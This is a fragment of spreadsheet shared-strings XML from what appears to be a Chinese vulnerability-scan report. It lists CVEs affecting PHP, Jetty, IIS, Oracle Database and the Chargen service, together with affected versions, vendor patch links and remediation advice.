    <t>PHP 拒绝服务漏洞(CVE-2016-7417)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-334
http://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP 内存损坏漏洞(CVE-2016-7411)</t>
  </si>
  <si>
    <t>影响PHP:5.6.26以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-328
https://bugs.php.net/bug.php?id=73052</t>
  </si>
  <si>
    <t>PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-5.phphttp://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-330
https://bugs.php.net/bug.php?id=72860</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2018-15132)</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.37版本,7.0版本(含)到7.0.31版本,7.1版本(含)到7.1.20版本,7.2版本(含)到7.2.8版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=76459</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-7.php
https://bugs.php.net/bug.php?id=76459</t>
  </si>
  <si>
    <t>PHP 堆缓冲区溢出安全漏洞（CVE-2018-14883）</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2018-14851)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201808-064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14851</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞（CVE-2018-10548）</t>
  </si>
  <si>
    <t>PHP 栈缓冲区溢出漏洞（CVE-2018-7584）</t>
  </si>
  <si>
    <t>ips-11020693（无效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.33版本,7.0版本(含)到7.0.28版本,7.1版本(含)到7.1.14版本,7.2版本(含)到7.2.2版本</t>
  </si>
  <si>
    <t>PHP 越界写漏洞(CVE-2017-9226)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/690313a061f7a4fa614ec5cc8368b4f2284e059b</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201705-1198
https://github.com/kkos/oniguruma/issues/55</t>
  </si>
  <si>
    <t>PHP 越界写漏洞(CVE-2017-9228)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/9690d3ab1f9bcd2db8cbe1fe3ee4a5da606b8814</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201705-1196
https://github.com/kkos/oniguruma/issues/60
https://access.redhat.com/errata/RHSA-2018:1296</t>
  </si>
  <si>
    <t>PHP Apache2组件跨站脚本漏洞(CVE-2018-17082)</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.6.38版本,7.0版本(含)到7.0.32版本,7.1版本(含)到7.1.22版本,7.2版本(含)到7.2.10版本</t>
  </si>
  <si>
    <t>厂商补丁：PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://php.net/ChangeLog-5.phphttp://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP&lt;5.6.307.0.0≤PHP&lt;7.0.157.1.0≤PHP&lt;7.1.1</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/php/php-src/commit/16b3003ffc6393e250f069aa28a78dc5a2c064b2</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-7.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_26156&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP GD Graphics Library  整数溢出漏洞(CVE-2016-7568)</t>
  </si>
  <si>
    <t>PHP &lt; 7.0.11</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7568
https://www.cnvd.org.cn/flaw/show/CNVD-2016-08449
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_43335&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2017-7963)</t>
  </si>
  <si>
    <t>影响php:7.1.4版本(含)以下版本</t>
  </si>
  <si>
    <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:https://www.php.net/</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2017-7963</t>
  </si>
  <si>
    <t>影响PHP:5.6.0版本(含)到5.6.39版本,7.0版本(含)到7.0.33版本,7.1版本(含)到7.1.25版本,7.2版本(含)到7.2.13版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页： https://www.php.net</t>
  </si>
  <si>
    <t>PHP EXIF组件安全漏洞（CVE-2019-9640）</t>
  </si>
  <si>
    <t>厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.php.net/bug.php?id=77540</t>
  </si>
  <si>
    <t>https://www.php.net/
https://bugs.php.net/bug.php?id=77540
https://www.debian.org/security/2019/dsa-4403</t>
  </si>
  <si>
    <t>PHP EXIF组件安全漏洞（CVE-2019-9639）</t>
  </si>
  <si>
    <t>厂商补丁: PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：  https://bugs.php.net/bug.php?id=77659</t>
  </si>
  <si>
    <t>https://www.php.net/
https://bugs.php.net/bug.php?id=77659
https://www.debian.org/security/2019/dsa-4403</t>
  </si>
  <si>
    <t>PHP安全漏洞(CVE-2018-19518)</t>
  </si>
  <si>
    <t>5.6.0≤PHP≤ 5.6.38</t>
  </si>
  <si>
    <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法： https://bugs.php.net/bug.php?id=76428https://bugs.php.net/bug.php?id=77153https://bugs.php.net/bug.php?id=77160</t>
  </si>
  <si>
    <t>http://www.securitytracker.com/id/1042157
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2019_11088&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP&lt;5.6.317.0.0≤PHP&lt;7.0.217.1.0≤PHP&lt;7.1.7</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugs.php.net/bug.php?id=74603</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=74603
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15760&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP Fileinfo组件 cdf_read_short_sector 函数缓冲区溢出漏洞(CVE-2014-0207)</t>
  </si>
  <si>
    <t>PHP&lt;5.9.45.5.0&lt;PHP&lt;5.5.14</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=67326
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15614&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oniguruma PHP 缓冲区错误漏洞(CVE-2017-9225)</t>
  </si>
  <si>
    <t>影响php:7.1.5版本(含)以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
  </si>
  <si>
    <t>https://github.com/kkos/oniguruma/commit/166a6c3999bf06b4de0ab4ce6b088a468cc4029f</t>
  </si>
  <si>
    <t>https://172.16.5.73:4436</t>
  </si>
  <si>
    <t>4436</t>
  </si>
  <si>
    <t>Chargen 服务正在运行中(CVE-1999-0639)</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>攻击者可以借此收集信息，以便下一步的进攻</t>
  </si>
  <si>
    <t>关闭Chargen服务</t>
  </si>
  <si>
    <t>IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)</t>
  </si>
  <si>
    <t>IIS: 8.5</t>
  </si>
  <si>
    <t>影响IIS:8.0版本,8.5版本</t>
  </si>
  <si>
    <t>Microsoft --------- Microsoft已经为此发布了一个安全公告（MS14-076）以及相应补丁: MS14-076：Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) 链接：https://learn.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-076</t>
  </si>
  <si>
    <t>https://learn.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-076</t>
  </si>
  <si>
    <t>Jetty 信息泄露漏洞(CVE-2019-10247)</t>
  </si>
  <si>
    <t>4040</t>
  </si>
  <si>
    <t>jetty: 9.4</t>
  </si>
  <si>
    <t>影响Jetty:7.0版本(含)到9.2.28版本,9.3.0版本(含)到9.3.27版本,9.4.0版本(含)到9.4.17版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.eclipse.org/bugs/show_bug.cgi?id=546577</t>
  </si>
  <si>
    <t>Eclipse Jetty信息泄露漏洞（CVE-2018-12536）</t>
  </si>
  <si>
    <t>影响Jetty:9.0.0版本(含)到9.2.26版本,9.3.0版本(含)到9.3.24版本,9.4.0版本(含)到9.4.11版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.eclipse.org/bugs/show_bug.cgi?id=535670</t>
  </si>
  <si>
    <t>Chargen 服务远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>该漏洞可导致主机拒绝服务</t>
  </si>
  <si>
    <t xml:space="preserve"> -在Unix系统下，将/etc/inetd.conf中的“chargen”行注释掉,然后重启inetd进程-在Windows系统下，将以下注册表项设置为0：  HKLM/System/CurrentControlSet/Services/SimpTCP/Parameters/EnableTcpChargen  HKLM/System/CurrentControlSet/Services/SimpTCP/Parameters/EnableUdpChargen然后启动cmd.exe并输入：   net stop simptcp   net start simptcp重新启动服务。</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-199602-002</t>
  </si>
  <si>
    <t>Eclipse Jetty跨站脚本执行漏洞（CVE-2019-10241）</t>
  </si>
  <si>
    <t>影响Jetty:9.2.0版本(含)到9.2.27版本,9.3.0版本(含)到9.3.26版本,9.4.0版本(含)到9.4.16版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.eclipse.org/bugs/show_bug.cgi?id=546121</t>
  </si>
  <si>
    <t>Eclipse Jetty 输入验证错误漏洞(CVE-2018-12545)</t>
  </si>
  <si>
    <t>影响Jetty:9.3.0版本(含)到9.4.12版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.eclipse.org/bugs/show_bug.cgi?id=538096</t>
  </si>
  <si>
    <t>Eclipse Jetty 授权问题漏洞(CVE-2018-12538)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.0版本(含)到9.4.8版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.eclipse.org/bugs/show_bug.cgi?id=536018</t>
  </si>
  <si>
    <t>Jetty 信息泄露漏洞(CVE-2017-9735)</t>
  </si>
  <si>
    <t>影响Jetty:9.4.6以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://github.com/eclipse/jetty.project/issues/1556</t>
  </si>
  <si>
    <t>Eclipse Jetty HTTP请求走私漏洞（CVE-2017-7658）</t>
  </si>
  <si>
    <t>影响Jetty:6.0.0版本(含)到9.2.26版本(含),9.3.0版本(含)到9.3.24版本,9.4.0版本(含)到9.4.11版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.eclipse.org/bugs/show_bug.cgi?id=535669</t>
  </si>
  <si>
    <t>Eclipse Jetty HTTP请求走私漏洞（CVE-2017-7657）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668</t>
  </si>
  <si>
    <t>Eclipse Jetty HTTP请求走私漏洞（CVE-2017-7656）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://bugs.eclipse.org/bugs/show_bug.cgi?id=535667</t>
  </si>
  <si>
    <t>Oracle 2010年10月更新修复多个Oracle Database安全漏洞</t>
  </si>
  <si>
    <t>Oracle: 11.2.0.1</t>
  </si>
  <si>
    <t>影响oracle:9.2.0.8版本,10.1.0.5版本,10.2.0.4版本,11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuoct2010）以及相应补丁:cpujul2010：Oracle Critical Patch Update Advisory - October2010链接：https://www.oracle.com/security-alerts/cpujan2010.html</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuoct2010）以及相应补丁:cpujul2010：Oracle Critical Patch Update Advisory - October2010链接：http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuoct2010）以及相应补丁:cpujul2010：Oracle Critical Patch Update Advisory - October2010链接：https://www.oracle.com/security-alerts/cpujul2010.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2010.html</t>
  </si>
  <si>
    <t>Oracle Database Server Database Vault本地信息泄露漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.3版本(含)到10.2.0.5版本(含),11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html</t>
  </si>
  <si>
    <t>Oracle数据库CREATE_CHANGE_SET过程SQL注入漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.4版本,11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuoct2010）以及相应补丁:cpuoct2010：Oracle Critical Patch Update Advisory - October 2010链接：http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html</t>
  </si>
  <si>
    <t>Oracle Database Server和Fusion Middleware Help组件未明漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.3版本,10.2.0.4版本,10.2.0.5版本,11.1.0.7版本,11.2.0.1版本,11.2.0.2版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html</t>
  </si>
  <si>
    <t xml:space="preserve">www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control CMDB Metadata Inst漏洞(CVE-2011-0816)</t>
  </si>
  <si>
    <t>Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.htmlhttp://www.oracle.com/technetwork/topics/security/</t>
  </si>
  <si>
    <t>Oracle Database Server 远程Enterprise Config Management漏洞(CVE-2011-0831)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-0835)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.2.0.2版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>Oracle Database Server Scheduler Agent远程安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>Oracle Database Server Cluster Verify Utility本地权限提升漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.4版本，10.2.0.5版本,11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html</t>
  </si>
  <si>
    <t>Oracle数据库Java存储过程竞争条件代码执行漏洞(CVE-2010-2419)</t>
  </si>
  <si>
    <t>Oracle  Database Server Perl组件未明漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.3版本,10.2.0.4版本,11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html</t>
  </si>
  <si>
    <t xml:space="preserve">www.oracle.com
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2010-175626.html
</t>
  </si>
  <si>
    <t>Oracle数据库服务器Warehouse Builder组件远程漏洞(CVE-2011-0799)</t>
  </si>
  <si>
    <t>ips-11070704, ips-11070705（无效）</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.5版本,11.2.0.1版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html</t>
  </si>
  <si>
    <t>Oracle Database Server UIX组件未明漏洞(CVE-2011-0805)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,10.1.0.5版本,11.1.0.7版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-0880)</t>
  </si>
  <si>
    <t>Oracle 2010年4月更新修复多个JavaVM组件安全漏洞(CVE-2010-0866)</t>
  </si>
  <si>
    <t>ips-17264（有效）</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2010）以及相应补丁:cpuapr2010：Oracle Critical Patch Update Advisory - April 2010链接：http://www.oracle.com/technetwork/topics/security/cpuapr2010-099504.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2010-099504.html</t>
  </si>
  <si>
    <t>Oracle 2010年4月更新修复多个JavaVM组件安全漏洞(CVE-2010-0867)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.1.0.7版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Database Vault远程安全漏洞</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com</t>
  </si>
  <si>
    <t>Oracle Spatial UI Infrastructure组件远程安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.4版本,11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>Oracle Database Server Job Queue组件安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.3版本(含)到10.2.0.4版本(含),11.1.0.7版本,11.2.0.1版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html</t>
  </si>
  <si>
    <t>Oracle 2010年10月更新修复Oracle Database安全漏洞( CVE-2009-3555)</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.5版本,11.2.0.1版本,11.2.0.2版本,11.1.0.7版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html</t>
  </si>
  <si>
    <t>Oracle数据库服务器Database Vault组件远程非授权访问漏洞（CVE-2011-0793）</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.5版本,11.2.0.1版本,10.2.0.3版本,10.2.0.4版本,11.1.0.7版本</t>
  </si>
  <si>
    <t>Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html</t>
  </si>
  <si>
    <t>Oracle数据库Network Foundation组件远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.2.0.2版本,10.1.0.5版本,11.1.0.7版本,10.2.0.5版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-0832)</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-0838)</t>
  </si>
  <si>
    <t>Oracle Database Server和Enterprise Manager Grid Control Schema Management组件远程安全漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</t>
  </si>
  <si>
    <t>www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
http://secunia.com/advisories/45274
http://secunia.com/advisories/45275</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control远程安全框架漏洞(CVE-2011-0848)</t>
  </si>
  <si>
    <t>Oracle Database Server Enterprise Manager Console远程安全漏洞(CVE-2011-0876)</t>
  </si>
  <si>
    <t>Oracle Database Server RDBMS远程Core RDBMS漏洞(CVE-2011-2239)</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.3版本,10.2.0.4版本,10.2.0.5版本,11.1.0.7版本,11.2.0.1版本,11.2.0.2版本</t>
  </si>
  <si>
    <t xml:space="preserve">厂商补丁：Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html </t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</t>
  </si>
  <si>
    <t>Oracle Database Server Core RDBMS本地安全漏洞(CVE-2011-2242)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.2.0.2版本</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujuly2011.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2242
http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html#AppendixSUNS
https://www.cnvd.org.cn/flaw/show/CNVD-2011-2819
http://secunia.com/advisories/45274/</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-2243)</t>
  </si>
  <si>
    <t>影响oracle:11.2.0.1版本,11.2.0.2版本,11.1.0.7.3版本</t>
  </si>
  <si>
    <t xml:space="preserve">案 厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html </t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2243
https://www.cnvd.org.cn/flaw/show/CNVD-2011-2820</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-2253)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</t>
  </si>
  <si>
    <t>Oracle Database Target Type Menus远程安全漏洞(CVE-2011-2257)</t>
  </si>
  <si>
    <t>Oracle Database Server远程Core RDBMS漏洞(CVE-2011-2230)</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.5版本,11.2.0.1版本,11.1.0.7版本,10.2.0.4版本,10.2.0.3版本</t>
  </si>
  <si>
    <t>Oracle------Oracle已经为此发布了一个安全公告（cpujuly2011-313328）以及相应补丁:cpujuly2011-313328：Oracle Critical Patch Update Advisory - July 2011链接：http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html</t>
  </si>
  <si>
    <t>Oracle Database Server远程Instance Management漏洞(CVE-2011-0879)</t>
  </si>
  <si>
    <t>Oracle Database Server远程XML Developer Kit漏洞(CVE-2011-2231)</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.5版本,11.2.0.1版本,11.1.0.7版本,10.2.0.3版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Application Server XML Developer Kit远程安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,11.2.0.1版本,11.1.0.7版本,10.2.0.3版本,10.2.0.4版本</t>
  </si>
  <si>
    <t>Oracle Database Server远程Database Vault漏洞(CVE-2011-2238)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2238
https://www.cnvd.org.cn/flaw/show/CNVD-2011-2817</t>
  </si>
  <si>
    <t>Oracle Database Server和Enterprise Manager Grid安全漏洞(CVE-2011-2244)</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2244
https://www.cnvd.org.cn/flaw/show/CNVD-2011-2759</t>
  </si>
  <si>
    <t>Oracle Enterprise Manager Grid Control SQL执行公告/UIs漏洞(CVE-2011-2248)</t>
  </si>
  <si>
    <t>Oracle Database 组件Core RDBMS 未明身份认证和权限管理漏洞（CVE-2009-0985)</t>
  </si>
  <si>
    <t>Oracle: 11.1.0.6</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.4版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商已经发布了更新程序修补漏洞。有关更新程序的更多信息，请查看以下链接：http://www.oracle.com/technetwork/topics/security/cpuapr2009-099563.html</t>
  </si>
  <si>
    <t>Oracle 组件Network Foundation 多个未知漏洞（CVE-2009-1963）</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商已经发布了更新程序修补漏洞。有关更新程序的更多信息，请查看以下链接：http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html</t>
  </si>
  <si>
    <t>Oracle 2008年4月更新修复多个安全漏洞（CVE-2008-1820）</t>
  </si>
  <si>
    <t>影响oracle:9.2.0.8版本,10.1.0.5版本,10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2008）以及相应补丁:  http://www.oracle.com/technetwork/topics/security/cpuapr2008-082075.html</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2604）</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujul2008）以及相应补丁:  http://www.oracle.com/technetwork/topics/security/cpujul2008-090335.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujul2008-090335.html</t>
  </si>
  <si>
    <t>Oracle 2008年4月更新修复多个安全漏洞（CVE-2008-1815）</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2008）以及相应补丁: http://www.oracle.com/technetwork/topics/security/cpuapr2008-082075.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html</t>
  </si>
  <si>
    <t>Oracle Database Advanced Queuing和Spatial组件未明漏洞（CVE-2008-0340）</t>
  </si>
  <si>
    <t>影响oracle:9.0.1.5版本,9.2.0.8版本,10.1.0.5版本,10.2.0.2版本,10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：    http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2607）</t>
  </si>
  <si>
    <t>影响oracle:9.2.0.8版本,10.1.0.5版本,10.2.0.4版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujul2008）以及相应补丁:cpujul2008：Oracle Critical Patch Update Advisory - July 2008链接：http://www.oracle.com/technetwork/topics/security/cpujul2008-090335.html</t>
  </si>
